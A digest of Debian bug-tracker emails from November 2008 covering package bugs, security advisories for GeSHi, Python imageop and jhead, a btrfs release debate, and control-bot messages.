Package: neko Version: 1.7.0-1 Severity: serious After purging neko, the following files were left behind on my system: /etc/apache/conf.d/mod_neko /etc/apache2/mods-available/neko.conf /etc/apache2/mods-available/neko.load -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (530, 'testing'), (520, 'unstable'), (510, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.26-1-686 (SMP w/1 CPU core) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages neko depends on: ii libc6 2.7-15GNU C Library: Shared libraries ii libgc1c2 1:6.8-1.1 conservative garbage collector for ii libglib2.0-0 2.16.6-1 The GLib library of C routines ii libmysqlclient15off5.0.51a-15MySQL database client library ii libpcre3 7.6-2.1 Perl 5 Compatible Regular Expressi ii libsqlite3-0 3.5.9-5 SQLite 3 shared library ii zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime neko recommends no packages. neko suggests no packages. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504626: [nvidia-glx] Quietly drops support for several chipsets
Package: nvidia-glx Version: 173.14.09-5 Severity: serious Tags: patch Since 1.0.9746, support for several cards was dropped quietly. As pre-lenny suites need to have the X video driver specified, X will fail to start after an upgrade on a system using one of these card. Replacing the current NEWS.Debian with one containing one entry with the following description would warn users: * LEGACY GPUs: This release does not support anymore GeForce 2, 3 and 4, Quadro 2 and 4, Quadro DCC and Quadro NVS 400, 280 SD and 50 PCI. If you use one these cards, install the nvidia-glx-legacy-96xx, nvidia-glx-legacy-96xx-dev and/or nvidia-kernel-legacy-96xx-source packages instead. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504589: marked as done (Download location at debian/copyright is out of date)
Your message dated Wed, 05 Nov 2008 19:17:11 + with message-id <[EMAIL PROTECTED]> and subject line Bug#504589: fixed in pmount 0.9.18-2 has caused the Debian Bug report #504589, regarding Download location at debian/copyright is out of date to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 504589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504589 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: pmount Version: 0.9.18-1 Severity: serious Hello, According to Debian Policy 12.5 (a MUST hence serious severity): In addition, the copyright file must say where the upstream sources (if any) were obtained. However, http://www.piware.de/projects/ stated in copyright does not contain versions beyond 0.9.13. Since Google didn't return anything very obvious at first, it took me a while to figure out current upstream sources are hosted on Debian's Alioth/Git. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (101, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27-1-amd64 (SMP w/1 CPU core) Locale: LANG=lt_LT.UTF-8, LC_CTYPE=lt_LT.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages pmount depends on: ii libblkid1 1.41.3-1 block device id library ii libc6 2.7-16 GNU C Library: Shared libraries ii libdbus-1-3 1.2.1-4simple interprocess messaging syst ii libhal-storage1 0.5.11-6 Hardware Abstraction Layer - share ii libhal1 0.5.11-6 Hardware Abstraction Layer - share ii libsysfs2 2.1.0-5interface library to sysfs pmount recommends no packages. Versions of packages pmount suggests: ii cryptsetup2:1.0.6-6 configures encrypted block devices ii hal 0.5.11-6 Hardware Abstraction Layer -- no debconf information --- End Message --- --- Begin Message --- Source: pmount Source-Version: 0.9.18-2 We believe that the bug you reported is fixed in the latest version of pmount, which is due to be installed in the Debian FTP archive: pmount_0.9.18-2.diff.gz to pool/main/p/pmount/pmount_0.9.18-2.diff.gz pmount_0.9.18-2.dsc to pool/main/p/pmount/pmount_0.9.18-2.dsc pmount_0.9.18-2_amd64.deb to pool/main/p/pmount/pmount_0.9.18-2_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Vincent Fourmond <[EMAIL PROTECTED]> (supplier of updated pmount package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 05 Nov 2008 19:53:20 +0100 Source: pmount Binary: pmount Architecture: source amd64 Version: 0.9.18-2 Distribution: unstable Urgency: medium Maintainer: Vincent Fourmond <[EMAIL PROTECTED]> Changed-By: Vincent Fourmond <[EMAIL PROTECTED]> Description: pmount - mount removable devices as normal user Closes: 504589 Changes: pmount (0.9.18-2) unstable; urgency=medium . * Adding Vcs-* fields * Updated debian/copyright with new location of download files (closes: #504589) * Urgency medium to fix a trivial RC bug in testing. Checksums-Sha1: 7ee5162149900fe13a2b3bac0d8ffcca582d14c9 1173 pmount_0.9.18-2.dsc ef6dc96d054156c308c4f499388f913972e151e6 8281 pmount_0.9.18-2.diff.gz 54befe492bfc5dcabadc5a1f539aaf38154120f5 115958 pmount_0.9.18-2_amd64.deb Checksums-Sha256: aaf940a80b5486222d04df6bdc2c1ace9c0e477eb851cb07164235443f433274 1173 pmount_0.9.18-2.dsc 1000ed292cf3a6699c528c175383603ced02889e6be2105e560ef6b8e9a041a6 8281 pmount_0.9.18-2.diff.gz 944ea452e78a1c56c7a49ec61feba00990ccd63ba618b021517ddb0cd2e7a3df 115958 pmount_0.9.18-2_amd64.deb Files: 790bcfa5ebe44099dad36952e0484bc9 1173 utils optional pmount_0.9.18-2.dsc 6926430856eaed07b19c2f8bf27a9863 8281 utils optional pmount_0.9.18-2.diff.gz 81223af953bb40e34941b232321cf71b 115958 utils optional pmount_0.9.18-2_amd64.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkkR7ecACgkQx/UhwSKygsrjPgCeIhUCpDaJzYVDKF68BeIDzR7S hSgAnidxEZrdcNB2Hg9L2N1dhLTCb/Vl =WxEF -END PGP SIGNATURE- --- End Message ---
Bug#504445: marked as done (SA32559: GeSHi Unspecified Code Execution Vulnerability)
Your message dated Wed, 05 Nov 2008 19:32:05 + with message-id <[EMAIL PROTECTED]> and subject line Bug#504445: fixed in geshi 1.0.8.1-1 has caused the Debian Bug report #504445, regarding SA32559: GeSHi Unspecified Code Execution Vulnerability to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 504445: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504445 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: php-geshi Severity: grave Version: 1.0.8-1 Tags: security Hi, The following SA (Secunia Advisory) id was published for GeSHi. SA32559[1]: > A vulnerability has been reported in GeSHI, which can potentially be > exploited by malicious people to compromise a vulnerable system. > > The vulnerability is caused due to an unspecified error, which may allow > execution of arbitrary code on an affected system. > > The vulnerability is reported in versions prior to 1.0.8.1. If you fix the vulnerability please also make sure to include the SA id in the changelog entry. [1]http://secunia.com/Advisories/32559/ Cheers, -- Raphael Geissert - Debian Maintainer www.debian.org - get.debian.net signature.asc Description: This is a digitally signed message part. --- End Message --- --- Begin Message --- Source: geshi Source-Version: 1.0.8.1-1 We believe that the bug you reported is fixed in the latest version of geshi, which is due to be installed in the Debian FTP archive: geshi_1.0.8.1-1.diff.gz to pool/main/g/geshi/geshi_1.0.8.1-1.diff.gz geshi_1.0.8.1-1.dsc to pool/main/g/geshi/geshi_1.0.8.1-1.dsc geshi_1.0.8.1.orig.tar.gz to pool/main/g/geshi/geshi_1.0.8.1.orig.tar.gz php-geshi_1.0.8.1-1_all.deb to pool/main/g/geshi/php-geshi_1.0.8.1-1_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Romain Beauxis <[EMAIL PROTECTED]> (supplier of updated geshi package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 05 Nov 2008 20:06:07 +0100 Source: geshi Binary: php-geshi Architecture: source all Version: 1.0.8.1-1 Distribution: unstable Urgency: low Maintainer: Mediawiki Maintenance Team <[EMAIL PROTECTED]> Changed-By: Romain Beauxis <[EMAIL PROTECTED]> Description: php-geshi - Generic Syntax Highlighter Closes: 504445 Changes: geshi (1.0.8.1-1) unstable; urgency=low . * New upstream release. * fix SA32559: "A vulnerability has been reported in GeSHI, which can potentially be exploited by malicious people to compromise a vulnerable system. . The vulnerability is caused due to an unspecified error, which may allow execution of arbitrary code on an affected system." Closes: #504445 Checksums-Sha1: 6aee190d5b5b846b98df1ab50816432695b77d0f 1384 geshi_1.0.8.1-1.dsc b90bb81ba8afb8c9aee8d89086e65d1b5c741da9 665497 geshi_1.0.8.1.orig.tar.gz ed9f26378da06bc2adafb7c00b241394ebd71133 2656 geshi_1.0.8.1-1.diff.gz b1a41092da7c50c46c6f7800209d30bfa547b22e 618586 php-geshi_1.0.8.1-1_all.deb Checksums-Sha256: 7353cb960f2d5edaf23f9ed8c94bf1d8e6e6c5e85071881c00d5478b4e4f9e42 1384 geshi_1.0.8.1-1.dsc a72443c3b601ecb77919343337489c767df74a0dd0576213aa8b5754cfa34afe 665497 geshi_1.0.8.1.orig.tar.gz fa458c0827315247b77f5acb20281b4e59017529d868b54a4ea292225899f10c 2656 geshi_1.0.8.1-1.diff.gz b6c79d153d02d7c241c52f1fff078a252a34c27494067c43cb04463632617371 618586 php-geshi_1.0.8.1-1_all.deb Files: b04af5afa361fd4c8c75d92dcd93c3b2 1384 web optional geshi_1.0.8.1-1.dsc 050ef2549f1196a5e6816e2f4dccb3e0 665497 web optional geshi_1.0.8.1.orig.tar.gz 3e63c9662fc21351db778a5aaa30a6c9 2656 web optional geshi_1.0.8.1-1.diff.gz a2b5cb6748f855190d8b98f64722027c 618586 web optional php-geshi_1.0.8.1-1_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJEfNpAAoJEAC5aaocqV0Zs8UH/A2TsCCbwVJCwThlQJ46r6cr RsBGPpyy3yrXuiGOZmbd0FYQiH0X+v5dwd1M4TXDnZJhXhVU5YBx78F8IRmOjl75 SUZZfINTDsbHRjJ9D63CKQAusoLrBOTyiaY6o1tnN7tGPwUq2UV7Hx00hSl0ekua vbQsBEZyHwUyvTD6P/ybMU0TklUslW3aWBTwZWcvMIMvsv1JgmvsPLIR7gDE+UkM Zk38MUTqHLChmuYWqQJFOdNs9FsupLwQhLIXbTxdEm6CDotyZ5ohQgvswLXuSMT7 Dkwu0E2X5PNrXtDjN81Rt3NFynGe/k8UP2WjXeDEfFn0D7nWVAM2IUiHK8Z8WVo= =ZjS3 -END PGP SIGNATURE
Processed: your mail
Processing commands for [EMAIL PROTECTED]: > notfound 504445 1.0.8-1 Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability Bug no longer marked as found in version 1.0.8-1. > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: Fwd: woops
Processing commands for [EMAIL PROTECTED]: > found 504445 1.0.8-1 Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability Bug marked as found in version 1.0.8-1. > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: tagging as pending bugs that are closed by packages in NEW
Processing commands for [EMAIL PROTECTED]: > # Wed Nov 5 19:03:09 UTC 2008 > # Tagging as pending bugs that are closed by packages in NEW > # http://ftp-master.debian.org/new.html > # > # Source package in NEW: libtemplate-plugin-dbi-perl > tags 504575 + pending Bug#504575: ITP: libtemplate-plugin-dbi-perl -- DBI plugin for the Template Toolkit There were no tags set. Tags added: pending > # Source package in NEW: request-tracker3.8 > tags 498124 + pending Bug number 498124 not found. (Is it archived?) > # Source package in NEW: request-tracker3.8 > tags 492939 + pending Bug#492939: ITP: request-tracker3.8 -- Extensible trouble-ticket tracking system There were no tags set. Tags added: pending > # Source package in NEW: request-tracker3.8 > tags 503329 + pending Bug#503329: request-tracker3.6 - Generates self referencing URLs from wrong values Tags were: patch Tags added: pending > # Source package in NEW: request-tracker3.8 > tags 503667 + pending Bug#503667: request-tracker3.6 - Use debconf as registry There were no tags set. Tags added: pending > End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: reassign 504619 to python2.5
Processing commands for [EMAIL PROTECTED]: > reassign 504619 python2.5 Bug#504619: python2.5: CVE-2008-4864 multiple integer overflows in imageop module Warning: Unknown package 'pyton2.5' Bug reassigned from package `pyton2.5' to `python2.5'. > End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504620: python2.4: CVE-2008-4864 multiple integer overflows in imageop module
Package: python2.4 Severity: grave Tags: security patch Hi, the following CVE (Common Vulnerabilities & Exposures) id was published for python2.4. CVE-2008-4864[0]: | Multiple integer overflows in imageop.c in the imageop module in | Python 1.5.2 through 2.5.1 allow context-dependent attackers to break | out of the Python VM and execute arbitrary code via large integer | values in certain arguments to the crop function, leading to a buffer | overflow, a different vulnerability than CVE-2007-4965 and | CVE-2008-1679. Upstream patch: http://svn.python.org/view/python/trunk/Modules/imageop.c?p2=%2Fpython%2Ftrunk%2FModules%2Fimageop.c&p1=python%2Ftrunk%2FModules%2Fimageop.c&r1=66689&r2=66688&rev=66689&view=diff&diff_format=u If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864 http://security-tracker.debian.net/tracker/CVE-2008-4864 -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpRSWGX8r0ae.pgp Description: PGP signature
Processed: your mail
Processing commands for [EMAIL PROTECTED]: > found 504445 1.0.7.22-1 Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability Bug marked as found in version 1.0.7.22-1. > found 504445 1.0.7.14-1 Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability Bug marked as found in version 1.0.7.14-1. > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504619: python2.5: CVE-2008-4864 multiple integer overflows in imageop module
Package: pyton2.5 Version: 2.5-5+etch1 Severity: grave Tags: security patch Hi, the following CVE (Common Vulnerabilities & Exposures) id was published for pyton2.5. CVE-2008-4864[0]: | Multiple integer overflows in imageop.c in the imageop module in | Python 1.5.2 through 2.5.1 allow context-dependent attackers to break | out of the Python VM and execute arbitrary code via large integer | values in certain arguments to the crop function, leading to a buffer | overflow, a different vulnerability than CVE-2007-4965 and | CVE-2008-1679. If you fix the vulnerability please also make sure to include the CVE id in your changelog entry. Upstream patch: http://svn.python.org/view/python/trunk/Modules/imageop.c?p2=%2Fpython%2Ftrunk%2FModules%2Fimageop.c&p1=python%2Ftrunk%2FModules%2Fimageop.c&r1=66689&r2=66688&rev=66689&view=diff&diff_format=u For further information see: [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864 http://security-tracker.debian.net/tracker/CVE-2008-4864 -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpsU1gnojjO3.pgp Description: PGP signature
Bug#504502: btrfs is WiP
* Daniel Baumann [Wed, 05 Nov 2008 19:24:14 +0100]: > Adeodato Simó wrote: > > I know Daniel doesn't agree, so I'll wait a couple days before > > proceeding with the removal in case he wants to provide a good rationale > > as for why this package (in its current version) should be part of a > > stable Debian release. Daniel? > since the description clearly states that it is experimental, it's > better to have it in than out because it makes backporting easier > (limits interdiffs), gets more attention by people. What is the action to take if a user installs btrfs in stable, finds a "data loss" bug, and reports it as grave? "Sorry, although you installed this from stable this software is experimental and you should've read the description and anyway the bug you report does not happen in the version in backports.org."? > however, there is no point having btrfs in without btrfs-tools, and for > btrfs-tools see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495562#46 That is moot because, should I change my opinion about btrfs, I'd let btrfs-tools back. -- Adeodato Simó dato at net.com.org.es Debian Developer adeodato at debian.org Any life, no matter how long and complex it may be, is made up of a single moment: the moment in which a man finds out, once and for all, who he is. -- Jorge Luis Borges -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504502: btrfs is WiP
Adeodato Simó wrote: > I know Daniel doesn't agree, so I'll wait a couple days before > proceeding with the removal in case he wants to provide a good rationale > as for why this package (in its current version) should be part of a > stable Debian release. Daniel? since the description clearly states that it is experimental, it's better to have it in than out because it makes backporting easier (limits interdiffs), gets more attention by people. however, there is no point having btrfs in without btrfs-tools, and for btrfs-tools see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495562#46 -- Address:Daniel Baumann, Burgunderstrasse 3, CH-4562 Biberist Email: [EMAIL PROTECTED] Internet: http://people.panthera-systems.net/~daniel-baumann/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504603: libbobcat1: shlibs file fails to reflect ABI additions
Dear Aaron M. Ucko, you wrote: > > Package: libbobcat1 > Version: 1.21.1-1 > Severity: serious > Justification: Policy 8.6 > > libbobcat1's shlibs file leads to unversioned dependencies on the > library, ... > > In this case, though, I would suggest simply adding -V to your call to > dh_makeshlibs, such that packages built against libbobcat1 always > depend on at least the upstream version against which they were built. Dear Aaron, Thank you for filing this bug against Bobcat. You're of course absolutely right and I think your suggestion is a valuable one that can easily be met in future releases. Actually the bug filed against xd clarified the (dependency) bug that had crept into the dependencies list. The problem will be attacked along two main approaches: 1. paying more attention to ABI and API breakages; 2. making sure that (at least my :-) packages clearly display the bobcat version against which the package should be linked. This reply was (of course) not written to close the bug; it was primarily sent to let you and others know that I'm aware of the problem and that for now using the latest (now 1.21.1) Bobcat version with packages that depend on Bobcat should be enough to avoid problems. Current work in progress on Bobcat will probably result in version 2.01.1 from which point on more thorough attention will be paid to version dependencies. Cheers, -- Frank B. Brokken Center for Information Technology, University of Groningen (+31) 50 363 9281 Public PGP key: http://pgp.surfnet.nl Key Fingerprint: 8E36 9FC4 1DAA FCDF 1A0D B19F DAC4 BE50 38C6 6170 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#490893: still reproducible?
On 2008-11-05 11:01 +0100, Yves-Alexis Perez wrote: > Is this still reproducible with the fix for #448470 which should make > portmap initscript more reliable? At least one user (CC'ed) reported that the initscript did not run at all, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=490893#25. Subhashis, do you still see this? Regards, Sven -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503645: jhead: CVE-2008-4640, CVE-2008-4641 command injection via filename and insecure file handling
On Tue, Nov 4, 2008 at 1:29 PM, Matthias Wandel <[EMAIL PROTECTED]> wrote: > Ok, I changed the mkstemp back to mktemp. Do you plan to release the 2.85 version soon? I can only find version 2.84 on [1]. Bye [1] http://www.sentex.net/~mwandel/jhead/ -- Dr. Ludovic Rousseau -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503205: twitux: Will not connect to twitter.
On Wed, Nov 05, 2008 at 04:21:09PM +, Lawrence Woodman wrote: > Rogdrigo, > > > I think I have reproduced this: Are you using NetworkManager (gnome's > > default is yes)? If so, does *it* think the network is active? I think > > twitux is asking nm about the network status and silently failing to > > do *anything* if the answer from there is "off". > > As a follow-up to my last email. I have just uninstalled NetworkManager > and twitux works fine. great! > P.S. If you want me to test anything on my machine I am more than happy > to help. No need. Now that I know what's going on I can conduct futher testing locally. Thanks for the report, I will probably forward this upstream for them to work out some sort of solution. I believe that twitux should at least warn somehow about its thinking there is no network. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504502: btrfs is WiP
* Riku Voipio [Wed, 05 Nov 2008 14:23:12 +0200]: > btrfs-source package descripttion states, and homepage[1] agrees: > Btrfs is under heavy development, and is not suitable for any uses other > than benchmarking and review. The Btrfs disk format is not yet > finalized. > This is not something we want to release in stable. Remove from lenny > and keep bug open to not let it migrate? > [1] http://btrfs.wiki.kernel.org/index.php/Main_Page Right, btrfs-tools was removed from testing a while ago (#495562), and I oversighted to remove btrfs-source as well. I know Daniel doesn't agree, so I'll wait a couple days before proceeding with the removal in case he wants to provide a good rationale as for why this package (in its current version) should be part of a stable Debian release. Daniel? Cheers, -- Adeodato Simó dato at net.com.org.es Debian Developer adeodato at debian.org Faced with the choice between changing one's mind and proving that there is no need to do so, almost everyone gets busy with the proof. -- J.K. Galbraith -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503205: [EMAIL PROTECTED]: Re: Bug#503205: twitux: Will not connect to twitter.]
- Forwarded message from Lawrence Woodman <[EMAIL PROTECTED]> - Subject: Re: Bug#503205: twitux: Will not connect to twitter. From: Lawrence Woodman <[EMAIL PROTECTED]> To: Rodrigo Gallardo <[EMAIL PROTECTED]> Date: Wed, 05 Nov 2008 15:54:26 + Rodrigo, > I think I have reproduced this: Are you using NetworkManager (gnome's > default is yes)? If so, does *it* think the network is active? I think > twitux is asking nm about the network status and silently failing to > do *anything* if the answer from there is "off". I am using NetworkManager, mainly because I haven't had the time to work out how to remove it without removing other things that I want to keep. Anyway, Network Manager thinks that there is no connection. So it ties in with your theory so far. bfn Lawrence - End forwarded message - - Forwarded message from Lawrence Woodman <[EMAIL PROTECTED]> - Subject: Re: Bug#503205: twitux: Will not connect to twitter. From: Lawrence Woodman <[EMAIL PROTECTED]> To: Rodrigo Gallardo <[EMAIL PROTECTED]> Date: Wed, 05 Nov 2008 16:21:09 + Rogdrigo, > I think I have reproduced this: Are you using NetworkManager (gnome's > default is yes)? If so, does *it* think the network is active? I think > twitux is asking nm about the network status and silently failing to > do *anything* if the answer from there is "off". As a follow-up to my last email. I have just uninstalled NetworkManager and twitux works fine. This is great. Well done. Lawrence P.S. If you want me to test anything on my machine I am more than happy to help. - End forwarded message - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504604: current lenny version do not read files
> If you wish to submit further information on this problem, please > send it to [EMAIL PROTECTED], as before. additional notes: I know that is a poor programming practice summing number and strings, assuming strings are counted as 0 when summed, but nonetheless is the same behaviour that other programming language (perl as an example) have. I have installed a non-debian version of OOO3.0 and now i am almost happy, but nonetheless i want to point the error, since every previous version of OOO and also 3.0 current ones (as well MS-Excel) consider the blank string as a 0 when adding values, so could be a lot of files around that in the 2.4 version you choose to put in lenny instead of 3.0 are not properly loaded, and this is worse. about the final "OR" in my bugreport: consider as a "BESIDE" . 3.0 is a must for a new distribution. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: Re: actually a bug in sun java
Processing commands for [EMAIL PROTECTED]: > found 504524 6-07-4 Bug#504524: AWT_TOOLKIT=MToolkit causes java to segfault on amd64 Bug marked as found in version 6-07-4. > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504524: actually a bug in sun java
found 504524 6-07-4 thanks The bug also exists with lenny's version. -- .''`. martin f. krafft <[EMAIL PROTECTED]> : :' : proud Debian developer, author, administrator, and user `. `'` http://people.debian.org/~madduck - http://debiansystem.info `- Debian - when you have better things to do than fixing systems digital_signature_gpg.asc Description: Digital signature (see http://martin-krafft.net/gpg/)
Bug#504604: openoffice.org-calc: current lenny version do not read files made with 3.0
Package: openoffice.org-calc Version: 1:2.4.1-11 Severity: grave Justification: causes non-serious data loss Actually: it does not even read files made whit 2.3 i prepared an xls file usind a 2.0 version of ooo. i updated many times, until about 20 days ago was ok. now it is no longer read. It does not depend on format (either ods or xls have the same problem) some cells give error 529. These are cells that have in the formula: in R10: IF(T10-Z10<>0;T10-Z10;R$6) in W10: SUM(R9:R11) if T10-Z10 evaluate to a non zero value it is ok, if it is 0 (or better T10 is empty, Z0 in my files is always empty) instead it shows the error. R$6 cell is actually an empty string. If i change to a 0 or an empty cell the formula in return in R10: [numeric] 0. Using previous version or even 3.0 in R10 return an empty string (so it does not show anything in the display, that was the requirement) and in W10 just the value of (R9+R11) ignoring the empty string value . Can you fit this behaviour OR as an alternative make 3.0 immediately available on lenny ? -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.20-1-686 (SMP w/1 CPU core) Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash Versions of packages openoffice.org-calc depends on: ii libc62.7-15 GNU C Library: Shared libraries ii libgcc1 1:4.3.2-1 GCC support library ii libstdc++6 4.3.2-1 The GNU Standard C++ Library v3 ii libstlport4.6ldbl4.6.2-3.2 STLport C++ class library ii libsuitesparse-3.1.0 3.1.0-3 collection of libraries for comput ii lp-solve 5.5.0.10-10 Solve (mixed integer) linear progr pn openoffice.org-base-core (no description available) pn openoffice.org-core(no description available) openoffice.org-calc recommends no packages. openoffice.org-calc suggests no packages. Versions of packages openoffice.org-core depends on: ii fontconfig 2.6.0-1 generic font configuration library ii libc6 2.7-15GNU C Library: Shared libraries ii libcairo2 1.6.4-6.1 The Cairo 2D vector graphics libra ii libcurl3 7.18.2-7 Multi-protocol file transfer libra ii libdb4.6 4.6.21-11 Berkeley v4.6 Database Libraries [ ii libexpat1 2.0.1-4 XML parsing C library - runtime li ii libfreetype6 2.3.7-2 FreeType 2 font engine, shared lib ii libgcc11:4.3.2-1 GCC support library ii libglib2.0-0 2.16.6-1 The GLib library of C routines ii libgstreamer-plugins-b 0.10.20-1 GStreamer libraries from the "base ii libgstreamer0.10-0 0.10.20-1 Core GStreamer libraries and eleme ii libgtk2.0-02.12.11-4 The GTK+ graphical user interface ii libhunspell-1.2-0 1.2.6-1 spell checker and morphological an ii libhyphen0 2.4-4 ALTLinux hyphenation library - sha ii libice62:1.0.4-1 X11 Inter-Client Exchange library ii libicu38 3.8.1-3 International Components for Unico ii libjpeg62 6b-14 The Independent JPEG Group's JPEG ii libldap-2.4-2 2.4.11-1 OpenLDAP libraries ii libneon27 0.28.2-5 An HTTP and WebDAV client library ii libnspr4-0d4.7.1-4 NetScape Portable Runtime Library ii libnss3-1d 3.12.0-5 Network Security Service libraries ii libpam0g 1.0.1-4 Pluggable Authentication Modules l ii libpango1.0-0 1.20.5-3 Layout and rendering of internatio ii libsm6 2:1.0.3-2 X11 Session Management library pn libssl0.9.8(no description available) ii libstdc++6 4.3.2-1 The GNU Standard C++ Library v3 ii libstlport4.6ldbl 4.6.2-3.2 STLport C++ class library ii libx11-6 2:1.1.5-2 X11 client-side library ii libxaw72:1.0.4-2 X11 Athena Widget library ii libxext6 2:1.0.4-1 X11 miscellaneous extension librar ii libxinerama1 2:1.0.3-2 X11 Xinerama extension library ii libxml22.6.32.dfsg-4 GNOME XML library ii libxrender11:0.9.4-2 X Rendering Extension client libra ii libxslt1.1 1.1.24-2 XSLT processing library - runtime ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library ii libxtst6 2:1.0.3-1 X11 Testing -- Resource extension pn openoffice.org-common (no description available) pn ttf-opensymbol (no description avail
Bug#504573: sonata: Sonata fails to start after python upgrade.
